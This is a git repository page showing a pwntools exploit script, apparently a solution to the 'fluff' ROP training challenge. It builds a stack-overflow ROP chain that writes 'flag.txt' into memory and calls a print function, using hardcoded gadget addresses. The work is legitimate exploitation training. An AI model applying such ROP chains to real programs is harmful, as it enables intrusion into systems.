indigo/rop
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
rop/x86_64/fluff/exploit.py
Brett Weiland 4c25bd9188 new file: x86_64/fluff/exploit.py 
new file:   x86_64/fluff/gadgets
2020-12-17 19:39:54 -06:00

50 lines
1.1 KiB
Python
Executable File
Raw Blame History

#!/usr/bin/env python3
from pwn import *
letter_lookups = {
'f' : 0x00000000004003c4,
'l' : 0x0000000000400239,
'a' : 0x00000000004003d6,
'g' : 0x00000000004003cf,
'.' : 0x0000000000400251,
't' : 0x0000000000400192,
'x' : 0x0000000000400246}
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
for c in string:
payload += p64(0x40062a)
payload += p64(0x4000) # if things go wrong, check endian/order
payload += p64(letter_lookups[c] - 0x3ef2)
payload += p64(0x0000000000400610)
payload += p64(0)
payload += p64(0x400628)
payload += p64(0x400639)
return(payload)
prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) # set rdi
payload += p64(0x0000000000400510)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
prog.interactive()
Reference in New Issue View Git Blame Copy Permalink